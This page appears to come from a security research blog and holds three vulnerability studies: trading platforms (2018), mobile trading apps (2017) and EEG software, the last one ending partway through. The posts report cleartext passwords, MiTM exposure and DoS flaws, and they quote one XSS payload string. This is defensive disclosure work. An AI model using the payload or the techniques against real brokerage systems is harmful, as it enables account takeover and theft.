RESEARCH | August 7, 2018

Are You Trading Stocks Securely? Exposing Security Flaws in Trading Technologies

This blog post contains a small portion of the entire analysis. Please refer to the white paper for full details to the research.

Disclaimer

Most of the testing was performed using paper money (demo accounts) provided online by the brokerage houses. Only a few accounts were funded with real money for testing purposes. In the case of commercial platforms, the free trials provided by the brokers were used. Only end-user applications and their direct servers were analyzed. Other backend protocols and related technologies used in exchanges and financial institutions were not tested.

This research is not about High Frequency Trading (HFT), blockchain, or how to get rich overnight.

Introduction

The days of open outcry on trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks.

stock trading firm

The valuable information as well as the attack surface and vectors in trading environments are slightly different than those in banking systems.

Brokerage houses offer trading platforms to operate in the market. These applications allow you to do things including, but not limited to:

  • Fund your account via bank transfers or credit card
  • Keep track of your available equity and buying power (cash and margin balances)
  • Monitor your positions (securities you own) and their performance (profit)
  • Monitor instruments or indexes
  • Send buy/sell orders
  • Create alerts or triggers to be executed when certain thresholds are reached
  • Receive real-time news or video broadcasts
  • Stay in touch with the trading community through social media and chats

Needless to say, every single item on the previous list must be kept secret and only known by and shown to its owner.

Scope

My analysis started mid-2017 and concluded in July 2018. It encompassed the following platforms; many of them are some of the most used and well-known trading platforms, and some allow cryptocurrency trading:

  • 16 Desktop applications
  • 34 Mobile apps
  • 30 Websites

These platforms are part of the trading solutions provided by the following brokers, which are used by tens of millions of traders. Some brokers offer the three types of platforms, however, in some cases only one or two were reviewed due to certain limitations:

  • Ally Financial
  • AvaTrade
  • Binance
  • Bitfinex
  • Bitso
  • Bittrex
  • Bloomberg
  • Capital One
  • Charles Schwab
  • Coinbase
  • easyMarkets
  • eSignal
  • ETNA
  • eToro
  • E-TRADE
  • ETX Capital
  • ExpertOption
  • Fidelity
  • Firstrade
  • FxPro
  • GBMhomebroker
  • Grupo BMV
  • IC Markets
  • Interactive Brokers
  • IQ Option
  • Kraken
  • com
  • Merrill Edge
  • MetaTrader
  • Net
  • NinjaTrader
  • OANDA
  • Personal Capital
  • Plus500
  • Poloniex
  • Robinhood
  • Scottrade
  • TD Ameritrade
  • TradeStation
  • Yahoo! Finance

Devices used:

  • Windows 7 (64-bit)
  • Windows 10 Home Single (64-bit)
  • iOS 10.3.3 (iPhone 6) [not jailbroken]
  • iOS 10.4 (iPhone 6) [not jailbroken]
  • Android 7.1.1 (Emulator) [rooted]

Basic security controls/features were reviewed that represent just the tip of the iceberg when compared to more exhaustive lists of security checks per platform.

Results

Unfortunately, the results proved to be much worse compared with applications in retail banking. For example, mobile apps for trading are less secure than the personal banking apps reviewed in 2013 and 2015.

Apparently, cybersecurity has not been on the radar of the Financial Services Tech space in charge of developing trading apps. Security researchers have disregarded these technologies as well, probably because of a lack of understanding of money markets.

While testing I noted a basic correlation: the biggest brokers are the ones that invest more in fintech cybersecurity. Their products are more mature in terms of functionality, usability, and security.

Based on my testing results and opinion, the following trading platforms are the most secure:

Broker Platforms
TD Ameritrade Web and mobile
Charles Schwab Web and mobile
Merrill Edge Web and mobile
MetaTrader 4/5 Desktop and mobile
Yahoo! Finance Web and mobile
Robinhood Web and mobile
Bloomberg Mobile
TradeStation Mobile
Capital One Mobile
FxPro cTrader Desktop
IC Markets cTrader Desktop
Ally Financial Web
Personal Capital Web
Bitfinex Web and mobile
Coinbase Web and mobile
Bitso Web and mobile

The medium- to high-risk vulnerabilities found on the different platforms include full or partial problems with encryption, Denial of Service, authentication, and/or session management problems. Despite the fact that these platforms implement good security features, they also have areas that should be addressed to improve their security.

Following the platforms I consider must improve in terms of security:

Broker Platforms
Interactive Brokers Desktop, web and mobile
IQ Option Desktop, web and mobile
AvaTrade Desktop and mobile
E-TRADE Web and mobile
eSignal Desktop
TD Ameritrade’s Thinkorwim Desktop
Charles Schwab Desktop
TradeStation Desktop
NinjaTrader Desktop
Fidelity Web
Firstrade Web
Plus500 Web
Markets.com Mobile

Unencrypted Communications

In 9 desktop applications (64%) and in 2 mobile apps (6%), transmitted data unencrypted was observed. Most applications transmit most of the sensitive data in an encrypted way, however, there were some cases where cleartext data could be seen in unencrypted requests.

Among the data seen unencrypted are passwords, balances, portfolio, personal information and other trading-related data. In most cases of unencrypted transmissions, HTTP in plaintext was seen, and in others, old proprietary protocols or other financial protocols such as FIX were used.

Under certain circumstances, an attacker with access to some part of the network, such as the router in a public WiFi, could see and modify information transmitted to and from the trading application. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.

For example, the follow application uses unencrypted HTTP. In the screenshot, a buy order:

Another interesting example was found in eSignal’s Data Manager. eSignal is a known signal provider and integrates with a wide variety of trading platforms. It acts as a source of market data. During the testing, it was noted that Data Manager authenticates over an unencrypted protocol on the TCP port 2189, apparently developed in 1999.

As can be seen, the copyright states it was developed in 1999 by Data Broadcasting Corporation. Doing a quick search, we found a document from the SEC that states the company changed its name to Interactive Data Corporation, the owners of eSignal. In other words, it looks like it is an in-house development created almost 20 years ago. We could not corroborate this information, though.

The main eSignal login screen also authenticates through a cleartext channel:

FIX is a protocol initiated in 1992 and is one of the industry standard protocols for messaging and trade execution. Currently, it is used by a majority of exchanges and traders. There are guidelines on how to implement it through a secure channel, however, the binary version in cleartext was mostly seen. Tests against the protocol itself were not performed in this analysis.

A broker that supports FIX:

There are some cases where the application encrypts the communication channel, except in certain features. For instance, Interactive Brokers desktop and mobile applications encrypt all the communication, but not that used by iBot, the robot assistant that receives text or voice commands, which sends the instructions to the server embedded in a FIX protocol message in cleartext:

News related to the positions were also observed in plaintext:

Another instance of an application that uses encryption but not for certain channels is this one, Interactive Brokers for Android, where a diagnostics log with sensitive data is sent to the server in a scheduled basis through unencrypted HTTP:

A similar platform that sends everything over HTTPS is IQ Option, but for some reason, it sends duplicate unencrypted HTTP requests to the server disclosing the session cookie.

Others appear to implement their own binary protocols, such as Charles Schwab, however, symbols in watchlists or quoted symbols could be seen in cleartext:

Interactive Brokers supports encryption but by default uses an insecure channel; an inexperienced user who does not know the meaning of “SSL” (Secure Socket Layer) won’t enable it on the login screen and some sensitive data will be sent and received without encryption:

Passwords Stored Unencrypted

In 7 mobile apps (21%) and in 3 desktop applications (21%), the user’s password was stored unencrypted in a configuration file or sent to log files. Local access to the computer or mobile device is required to extract them, though. This access could be either physical or through malware.

In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-depth know-how (it’s relatively easily), log in through the web-based trading platform from the brokerage firm, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most web platforms (+75%) support two-factor authentication (2FA), however, it’s not enabled by default, the user must go to the configuration and enable it to receive authorization codes by text messages or email. Hence, if 2FA is not enabled in the account, it’s possible for an attacker, that knows the password already, to link a new bank account and withdraw the money from sold securities.

The following are some instances where passwords are stored locally unencrypted or sent to logs in cleartext:

Base64 is not encryption:

In some cases, the password was sent to the server as a GET parameter, which is also insecure:

One PIN for login and unlocking the app was also seen:

In IQ Option, the password was stored completely unencrypted:

However, in a newer version, the password is encrypted in a configuration file, but is still stored in cleartext in a different file:

Trading and Account Information Stored Unencrypted

In the trading context, operational or strategic data must not be stored unencrypted nor sent to the any log file in cleartext. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.

8 desktop applications (57%) and 15 mobile apps (44%) sent sensitive data in cleartext to log files or stored it unencrypted. Local access to the computer or mobile device is required to extract this data, though. This access could be either physical or through malware.

If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.

The following screenshots show applications that store sensitive data unencrypted:

Balances:

Investment portfolio:

Buy/sell orders:

Watchlists:

Recently quoted symbols:

Other data:

Trading Programming Languages with DLL Import Capabilities

This is not a bug, it’s a feature. Some trading platforms allow their customers to create their own automated trading robots (a.k.a. expert advisors), indicators, and other plugins. This is achieved through their own programming languages, which in turn are based on other languages, such as C++, C#, or Pascal.

The following are a few of the trading platforms with their own trading language:

  • MetaTrader: MetaQuotes Language (Based on C++ – Supports DLL imports)
  • NinjaTrader: NinjaScript (Based on C# – Supports DLL imports)
  • TradeStation: EasyLanguage (Based on Pascal – Supports DLL imports)
  • AvaTraceAct: ActFX (Based on Pascal – Does not support OS commands nor DLL imports)
  • (FxPro/IC Markets) cTrader: Based on C# (OS command and DLL support is unknown)

Nevertheless, some platforms such as MetaTrader warn their customers about the dangers related to DLL imports and advise them to only execute plugins from trusted sources. However, there are Internet tutorials claiming, “to make you rich overnight” with certain trading robots they provide. These tutorials also give detailed instructions on how to install them in MetaTrader, including enabling the checkbox to allow DLL imports. Innocent non-tech savvy traders are likely to enable such controls, since not everyone knows what a DLL file is or what is being imported from it. Dangerous.

Following a malicious Ichimoku indicator that, when loaded into any chart, downloads and executes a backdoor for remote access:

Another basic example is NinjaTrader, which simply allows OS commands through C#’s System.Diagnostics.Process.Start(). In the following screenshot, calc.exe executed from the chart initialization routine:

Denial of Service

Many desktop platforms integrate with other trading software through common TCP/IP sockets. Nevertheless, some common weaknesses are present in the connections handling of such services.

A common error is not implementing a limit of the number of concurrent connections. If there is no limit of concurrent connections on a TCP daemon, applications are susceptible to denial-of-service (DoS) or other type of attacks depending on the nature of the applications.

For example, TD Ameritrade’s Thinkorswim TCP-Orders Server listens on the TCP port 2000 in the localhost interface, and there is no limit for connections nor a waiting time between orders. This leads to the following problems:

  • Memory leakage since, apparently, the resources assigned to every connection are not freed upon termination.
  • Continuous order pop-ups (one pop-up per order received through the TCP server) render the application useless.
  • A NULL pointer dereference is triggered and an error report (.zip file) is created.

Regardless, it listens on the local interface only. There are different ways to reach this port, such as XMLHttpRequest() in JavaScript through a web browser.

Memory leakage could be easily triggered by creating as many connections as possible:

A similar DoS vulnerability due to memory exhaustion was found in eSignal’s Data Manager. eSignal is a known signal provider and integrates with a wide variety of trading platforms. It acts as a source of market data; therefore, availability is the most important asset:

It’s recommended to implement a configuration item to allow the user to control the behavior of the TCP order server, such as controlling the maximum number of orders sent per minute as well as the number of seconds to wait between orders to avoid bottlenecks.

The following capture from Interactive Brokers shows when this countermeasure is implemented properly. No more than 51 users can be connected simultaneously:

Session Still Valid After Logout

Normally, when the logout button is pressed in an app, the session is finished on both sides: server and client. Usually the server deletes the session token from its valid session list and sends a new empty or random value back to the client to clear or overwrite the session token, so the client needs to reauthenticate next time.

In some web platforms such as E-TRADE, Charles Schwab, Fidelity and Yahoo! Finance (Fixed), the session was still valid one hour after clicking the logout button:

Authentication

While most web-based trading platforms support 2FA (+75%), most desktop applications do not implement it to authenticate their users, even when the web-based platform from the same broker supports it.

Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only 8 apps (24%) do not implement this feature.

Unfortunately, using the fingerprint database in the phone has a downside:

Weak Password Policies

Some institutions let the users choose easily guessable passwords. For example:

The lack of a secure password policy increases the chances that a brute-force attack will succeed in compromising user accounts.

In some cases, such as in IQ Option and Markets.com, the password policy validation is implemented on the client-side only, hence, it is possible to intercept a request and send a weak password to the server:

Automatic Logout/Lockout for Idle Sessions

Most web-based platforms logout/lockout the user automatically, but this is not the case for desktop (43%) and mobile apps (25%). This is a security control that forces the user to authenticate again after a period of idle time.

Privacy Mode

This mode protects the customers’ private information from being displayed on the screen in public areas where shoulder-surfing attacks are feasible. Most of the mobile apps, desktop applications, and web platforms do not implement this useful and important feature.

The following images show before and after enabling privacy mode in Thinkorswim for mobile:

Hardcoded Secrets in Code and App Obfuscation

16 Android .apk installers (47%) were easily reverse engineered to human-readable code since they lack of obfuscation. Most Java and .NET-based desktop applications were also reverse-engineered easily. The rest of the applications had medium to high levels of obfuscation, such as Merrill Edge in the next screenshot.

The goal of obfuscation is to conceal the applications purpose (security through obscurity) and logic in order to deter reverse engineering and to make it more difficult.

In the non-obfuscated platforms, there are hardcoded secrets such as cryptographic keys and third-party service partner passwords. This information could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:

Interestingly, 14 of the mobile apps (41%) and 4 of the desktop platforms (29%) have traces (hostnames and IPs) about the internal development and testing environments where they were made or tested. Some hostnames are reachable from the Internet and since they’re testing systems they could lack of proper protections.

SSL Certificate Validation

11 of the reviewed mobile apps (32%) do not check the authenticity of the remote endpoint by verifying its SSL certificate; therefore, it’s feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require to trick the user into installing a malicious certificate on their phones, though.

The ones that verify the certificate normally do not transmit any data, however, only Charles Schwab allows the user to use the app with the provided certificate:

Lack of Anti-exploitation Mitigations

ASLR randomizes the virtual address space locations of dynamically loaded libraries. DEP disallows the execution of data in the data segment. Stack Canaries are used to identify if the stack has been corrupted. These security features make much more difficult for memory corruption bugs to be exploited and execute arbitrary code.

The majority of the desktop applications do not have these security features enabled in their final releases. In some cases, that these features are only enabled in some components, not the entire application. In other cases, components that handle network connections also lack these flags.

Linux applications have similar protections. IQ Option for Linux does not enforce all of them on certain binaries.

Other Weaknesses

More issues were found in the platforms. For more details, please refer to the white paper. 

Statistics

Since a picture is worth a thousand words, consider the following graphs:

For more statistics, please refer to the white paper.

Responsible Disclosure

One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure. In September 2017 we sent a detailed report to 13 of the brokerage firms whose mobile trading apps presented some of the higher risks vulnerabilities discussed in this paper. More recently, between May and July 2018, we sent additional vulnerability reports to brokerage firms.

As of July 27, 2018, 19 brokers that have medium- or high-risk vulnerabilities in any of their platforms were contacted.

TD Ameritrade and Charles Schwab were the brokers that communicated more with IOActive for resolving the reported issues.

For a table with the current status of the responsible disclosure process, please refer to the white paper.

Conclusions and Recommendations

  • Trading platforms are less secure than the applications seen in retail banking.
  • There’s still a long way to go to improve the maturity level of security in trading technologies.
  • End users should enable all the security mechanisms their platforms offer, such as 2FA and/or biometric authentication and automatic lockout/logout. Also, it’s recommended not to trade while connected to public networks and not to use the same password for other financial services.
  • Brokerage firms should perform regular internal audits to continuously improve the security of their trading platforms.
  • Brokerage firms should also offer security guidance in their online education centers.
  • Developers should analyze their current applications to determine if they suffer from the vulnerabilities described in this paper, and if so, fix them.
  • Developers should design new, more secure financial software following secure coding practices.
  • Regulators should encourage brokers to implement safeguards for a better trading environment. They could also create trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
  • Rating organizations should include security in their reviews.

Side Note

Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.

With nothing left to say, I wish you happy and secure trading!

Thanks for reading,

Alejandro
@nitr0usmx

This blog post contains a small portion of the entire analysis.
Please refer to the white paper.

RESEARCH | September 26, 2017

Are You Trading Securely? Insights into the (In)Security of Mobile Trading Apps

The days of open shouting on the trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks.

From the beginning, bad actors have also joined Wall Street’s party, developing clever models for fraudulent gains. Their efforts have included everything from fictitious brokerage firms that ended up being Ponzi schemes[1] to organized cells performing Pump-and-Dump scams.[2] (Pump: buy cheap shares and inflate the price through sketchy financials and misleading statements to the marketplace through spam, social media and other technological means; Dump: once the price is high, sell the shares and collect a profit).

When it comes to financial cybersecurity, it’s worth noting how banking systems are organized when compared to global exchange markets. In banking systems, the information is centralized into one single financial entity; there is one point of failure rather than many, which make them more vulnerable to cyberattacks.[3] In contrast, global exchange markets are distributed; records of who owns what, who sold/bought what, and to whom, are not stored in a single place, but many. Like matter and energy, stocks and other securities cannot be created from the void (e.g. a modified database record within a financial entity). Once issued, they can only be exchanged from one entity to another. That said, the valuable information as well as the attack surface and vectors in trading environments are slightly different than those in banking systems.

 
Picture taken from http://business.nasdaq.com/list/
 

Over the years I’ve used the desktop and web platforms offered by banks in my country with limited visibility of available trade instruments. Today, accessing global capital markets is as easy as opening a Facebook account through online brokerage firms. This is how I gained access to a wider financial market, including US-listed companies. Anyone can buy and sell a wide range of financial instruments on the secondary market (e.g. stocks, ETFs, etc.), derivatives market (e.g. options, binary options, contracts for difference, etc.), forex markets, or the avant-garde cryptocurrency markets.

Most banks with investment solutions and the aforementioned brokerage houses offer mobile platforms to operate in the market. These apps allow you to do things including, but not limited to:

  • Fund your account via bank transfers or credit card
  • Keep track of your available equity and buying power (cash and margin balances)
  • Monitor your positions (securities you own) and their performance (profit)
  • Monitor instruments or indexes
  • Give buy/sell orders
  • Create alerts or triggers to be executed when certain thresholds are reached
  • Receive real-time news or video broadcasts
  • Stay in touch with the trading community through social media and chats

Needless to say, whether you’re a speculator, a very active intra-day trader, or simply someone who likes to follow long-term buy-and-hold strategies, every single item on the previous list must be kept secret and only known by and shown to its owner.


 

Four months ago, while using my trading app, I asked myself, “with the huge amount of money transacted in the money market, how secure are these mobile apps?” So, there I was, one minute later, starting this research to expose cybersecurity and privacy weaknesses in some of these apps.

Before I pass along my results, I’d like to share the interesting and controversial moral of the story:  The app developed by a brokerage firm who suffered a data breach many years ago was shown to be the most secure one.

Scope

My analysis encompassed the latest version of 21 of the most used and well-known mobile trading apps available on the Apple Store and Google Play. Testing focused only on the mobile apps; desktop and web platforms were not tested. While I discovered some security vulnerabilities in the backend servers, I did not include them in this article.

Devices:

  • iOS 10.3.3 (iPhone 6) [not jailbroken]
  • Android 7.1.1 (Emulator) [rooted]

I tested the following 14 security controls, which represent just the tip of the iceberg when compared to an exhaustive list of security checks for mobile apps. This may give you a better picture of the current state of these apps’ security. It’s worth noting that I could not test all of the controls in some of the apps either because a feature was not implemented (e.g. social chats) or it was not technically feasible (e.g. SSL pinning that wouldn’t allow data manipulation), or simply because I could not open an account.

Results

Unfortunately, the results proved to be much worse than those for personal banking apps in 2013 and 2015.[4] [5] Cybersecurity has not been on the radar of the FinTech space in charge of developing trading apps. Security researchers have disregarded these apps as well, probably because of a lack of understanding of money markets.

The issues I found in the tested controls are grouped in the following sections. Logos and technical details that mention the name of brokerage institutions were removed from the screenshots, logs, and reverse engineered code to prevent any negative impacts to their customers or reputation.

Cleartext Passwords Exposed

In four apps (19%), the user’s password was sent in cleartext either to an unencrypted XML configuration file or to the logging console. Physical access to the device is required to extract them, though.

In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-deptfh know-how (it’s relatively easily), log in through any other trading platform from the brokerage firm, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most of the apps require only the current password to link banking accounts and do not have two-factor authentication (2FA) implemented, therefore, no authorization one-time-password (OTP) is sent to the user’s phone or email.

In two apps, like the following one, in addition to logging the username and password, authentication takes place through an unencrypted HTTP channel:
In another app, the new password was exposed in the logging console when a user changes the password:

Trading and Account Information Exposed

In the trading context, operational or strategic data must not be sent unencrypted to the logging console nor any log file. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.

62% of the apps sent sensitive data to log files, and 67% stored it unencrypted. Physical access to the device is required to extract this data.

If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.

Imagine a hypothetical scenario where a high-profile, sophisticated investor loses his phone and the trading app he has been using stores his “Potential Investments” watchlist in cleartext. If the extracted watchlist ends up in the hands of someone who wants to mimic this investor’s strategy, they could buy stocks prior to a price increase. In the worst case, imagine a “Net Worth” figure landing in the wrong hands, say kidnappers, who now know how generous ransom could be.

Balances and investment portfolio leaked in logs:

 
Buy and sell orders leaked in detail in the logging console:
Personal information stored in configuration files:
 
“Potential Investments” and “Will Buy Later” watchlists leaked in the logs console:
 
“Favorites” watchlists leaked in the logs too:
 
Quoted tickers leaked:
 
Symbol quoted dumped in detail in the console:
 
Quoted instruments saved in a local SQLite database:
Account number and balances leaked:

Insecure Communication

Two apps use unencrypted HTTP channels to transmit and receive all data, and 13 of 19 apps that use HTTPS do not check the authenticity of the remote endpoint by verifying its SSL certificate (SSL pinning); therefore, it’s feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require to trick the user into installing a malicious certificate on the mobile device.

Under certain circumstances, an attacker with access to some part of the network, such as the router in a public Wi-Fi, could see and modify information transmitted to and from the mobile app. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.

For instance, the following app uses an insecure channel for communication by default; an inexperienced user who does not know the meaning of “SSL” (Secure Socket Layer) won’t enable it on the login screen and all sensitive data will be sent and received in cleartext, without encryption:

One single app was found to send a log file with sensitive trading data to the server on a scheduled basis over an unencrypted HTTP channel.

Some apps transmit non-sensitive data (e.g. public news or live financial TV broadcastings) through insecure channels, which does not seem to represent a risk to the user.

Authentication and Session Management

Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only five apps (24%) do not implement this feature.

Unfortunately, using the fingerprint database in the phone has a downside:

 
Moreover, after clicking the logout button, sessions were still valid on the server side in two apps. Also, another couple of apps enforced lax password policies:

Privacy Mode

One single trading app (look for “the moral of the story” earlier in this article) supports “Privacy Mode,” which protects the customers’ private information displayed on the screen in public areas where shoulder-surfing[6] attacks are feasible. The rest of the apps do not implement this useful and important feature.

However, there’s a small bug in this unique implementation: every sensitive figure is masked except in the “Positions” tab where the “Net Liquidity” column and the “Overall Totals” are fully visible:

It’s worth noting that not only balances, positions, and other sensitive values in the trading context should be masked, but also credit card information when entered to fund the account:

Client-side Data Validation

In most, but not all, of the apps that don’t check SSL certificates, it’s possible to perform MiTM attacks and inject malicious JavaScript or HTML code in the server responses. Since the Web Views in ten apps are configured to execute JavaScript code, it’s possible to trigger common Cross-site Scripting (XSS) attacks.

XSS triggered in two different apps (<script>alert(document.cookie);</script>):

Fake HTML forms injected to deceive the user and steal credentials:

Root Detection

Many Android apps do not run on rooted devices for security reasons. On a rooted phone or emulator, the user has full control of the system, thus, access to files, databases, and logs is complete. Once a user has full access to these elements, it’s easy to extract valuable information.

20 of the apps (95%) do not detect rooted environments. The single app (look for “the moral of the story” earlier in this article) that does detect it simply shows a warning message; it allows the user to keep using the platform normally:

Hardcoded Secrets in Code and App Obfuscation

Six Android app installers (.apk files) were easily reverse engineered to human-readable code. The rest had medium to high levels of obfuscation, as the one shown below. The goal of obfuscation is to conceal the applications purpose (security through obscurity) and logic in order to deter reverse engineering and to make it more difficult.

 
In the non-obfuscated apps, I found secrets such as cryptographic keys and third-party service partner passwords. This could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:
Interestingly, ten of the apps (47%) have traces (internal hostnames and IPs) about the internal development and testing environments where they were made or tested:

Other Weaknesses

The following trust issue grabbed my attention: a URL with my username (email) and first name passed as parameters was leaked to the logging console. This URL is opened to talk with, apparently, a chatbot inside the mobile app, but if you grab this URL and open it in a common web browser, the chatbot takes your identity from the supplied parameters and trusts you as a logged in user. From there, you can ask details about your account. As you can see, all you need to retrieve someone else’s private data is to know his/her email only and his/her name:

 

I haven’t had enough time to fully test this feature, but so far, I was able to extract balances and personal information.

Statistics

Since a picture is worth a thousand words, consider the following graphs:

Responsible Disclosure

One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure, thus, between September 6th and 8th, we sent a detailed report to 13 of the brokerage firms whose trading apps presented some of the higher risks vulnerabilities discussed in this article.

To the date, only two brokerage firms replied our email.

Regulators and Rating Organizations

Digging in some US regulators’ websites,[7] [8] [9] I noticed that they are already aware of the cybersecurity threats that might negatively impact financial markets and stakeholders. Most of the published content focuses on general threats that could impact end-users or institutions such as phishing, identity theft, antivirus software, social media risks, privacy, and procedures to follow in case of cybersecurity incidents, such as data breaches or disruptive attacks.

Nevertheless, I did not find any documentation related to the security risks of electronic trading nor any recommended guidance for secure software development to educate brokers and FinTech companies on how to create quality products.

Picture taken from http://www.reuters.com/article/net-us-internet-lending/for-online-lenders-wall-street-cash-brings-growth-and-risk-idUSBRE96204I20130703
 

In addition, there are rating organizations that score online brokers on a scale of 1 to 5 stars. I glimpsed at two recent reports [10] [11] and didn’t find anything related to security or privacy in their reviews. Nowadays, with the frequent cyberattacks in the financial industry, I think these organizations should give accolades or at least mention the security mechanisms the evaluated trading platforms implement in their reviews. Security controls should equal a competitive advantage.

Conclusions and Recommendations

  • There’s still a long way to go to improve the maturity level of security in mobile trading apps.
  • Desktop and web platforms should also be tested and improved.
  • Regulators should encourage brokers to implement safeguards for a better trading environment.
  • In addition to the generic IT best practices for secure software development, regulators should develop trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
  • Brokerage firms should perform regular internal audits to continuously improve the security posture of their trading platforms.
  • Developers should analyze their apps to determine if they suffer from the vulnerabilities I have described in this post, and if so, fix them.
  • Developers should design new, more secure financial software following secure coding practices.
  • End users should enable all of the security mechanisms their apps offer.

Side Thought

Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.

With nothing left to say, I wish you happy and secure trading!

 
Thanks for reading,
Alejandro
References
[1] Ponzi scheme
[2] “Pump-and-Dumps” and Market Manipulations
[3] Practical Examples Of How Blockchains Are Used In Banking And The Financial Services Sector
[4] Personal banking apps leak info through phone
[5] (In)secure iOS Mobile Banking Apps – 2015 Edition
[6] Shoulder surfing (computer security)
[7] Financial Industry Regulatory Authority: Cybersecurity
[8] Securities Industry and Financial Markets Association: Cybersecurity
[9] U.S. Securities and Exchange Commission: Cybersecurity, the SEC and You
[10] NerdWallet: Best Online Brokers for Stock Trading 2017
[11] StockBrockers: 2017 Online Broker Rankings
RESEARCH | February 3, 2016

Brain Waves Technologies: Security in Mind? I Don’t Think So

INTRODUCTION
Just a decade ago, electroencephalography (EEG) was limited to the inner rooms of hospitals, purely for medical purposes. Nowadays, relatively cheap consumer devices capable of measuring brain wave activity are in the hands of curious kids, researchers, artists, creators, and hackers. A few of the applications of this technology include:
·       EEG-controlled Exoskeleton Hope for ALS Sufferers
·       Brain-controlled Drone
·       Translating Soldier Thoughts to Computer Commands (Military)
·       Detect Battlefield Threats via Brain Waves (Military)
·       Neurowear (Clothing)
I’ve been monitoring the news for the last year, searching keywords brain waves, and the volume of headlines is growing quickly. In other words, people out there are having fun with brain waves and are creating cool stuff using existing consumer devices and (mostly) insecure software.
 
Based on my observations using a cheap EEG device and known software, I think that many of these technologies might contain security flaws that make them vulnerable to Man-in-The-Middle (MiTM), replay, Denial-of-Service (DoS), and other attacks.

RESEARCH BACKGROUND
A few months ago, I demonstrated some of the risks associated with the acquisition, transmission, and processing of EEGs at the Bio Hacking Village at DEF CON 23 (slide deck) and BruCON. I consider this pioneering research a wakeup call for vendors and developers. I see this technology in a similar position as industrial systems. Ten years ago, only a few people were talking about SCADA/Industrial Control System (ICS) security; today it’s a whole sub-industry. Even so, programmable logical controllers are still crashing due to basic malformed packets, and other ICS critical systems are vulnerable to replay attacks due to a lack of authentication and encryption. A similar scenario is playing out with brain wave/EEG technology.
 
It’s important to mention that some technologies such as Neuromore and NeuroElectrics’ NUBE can be used to upload your EEG activity to the cloud. I do not address this in depth, other than to note that privacy is an important concern. Is your brain activity being sent to the cloud securely? Once in the cloud, is it being stored securely? Place your bets.
In the following sections, I explain some of the security concerns I observed while playing with my own brain activity using a Neurosky Mindwave device and a variety of EEG software. Because I only present a few examples here, I encourage you to take a look to my full DEF CON slide deckfor more examples.
 

I should note that real attack scenarios are a bit hard for me to achieve, since I lack specific expertise in interpreting EEG data; however, I believe I effectively demonstrate that such attacks are 100 percent feasible.

DESIGN

Through Internet research, I reviewed several technical manuals, specifications, and brochures for EEG devices and software. I searched the documents for the keywords ‘secur‘, ‘crypt‘, ‘auth‘, and ‘passw‘; 90 percent didn’t contain one such reference. It’s pretty obvious that security has not been considered at all.

NO ENCRYPTION / NO AUTHENTICATION
The major risk associated with not using encryption or authentication is that an unauthorized person could read or impersonate someone’s brain waves through replay attacks or data tampering via MiTM attacks. The resulting level of risk depends on how the EEG data is used.

Let’s consider a MiTM attack scenario where an attacker modifies data on the fly during transmission, after data acquisition but before the brain waves reach the final destination for processing. NeuroServeris an EEG signal transceiver that uses TCP/IP and EDF format. Although the NeuroServer technology is old and unmaintained, it is still in use (mostly for research) and is included in BrainBay an open-source bio and neurofeedback application.

I recorded the whole MITM attack (full screen is recommended):


For this demonstration, I changed only an ASCII string (the patient name); however, the actual EEG data can be easily manipulated in binary format.

RESILIENCE

Resilience is the ability to support or recover from adversity, in this case, DoS attacks.

Brain waves are data. Data needs to be structured and parsed, and parsers have bugs. Following is a malformed EDF header I created to remotely crash NeuroServer:


I recorded the execution of this remote DoS proof of concept code against NeuroServer:
I couldn’t believe that 1990s techniques are still killing 21st century technology. I used an infinite loop to create as many network sockets as possible and keep them open.

The following two videos show applications crashing as a result of this old technique:

       Neuroelectrics NIC TCP Server Remote DoS

       OpenViBE (software for Brain Computer Interfaces and Real Time Neurosciences) Acquisition Server Remote DoS


THE “TOWER OF BABEL” OF EEG FILE FORMATS

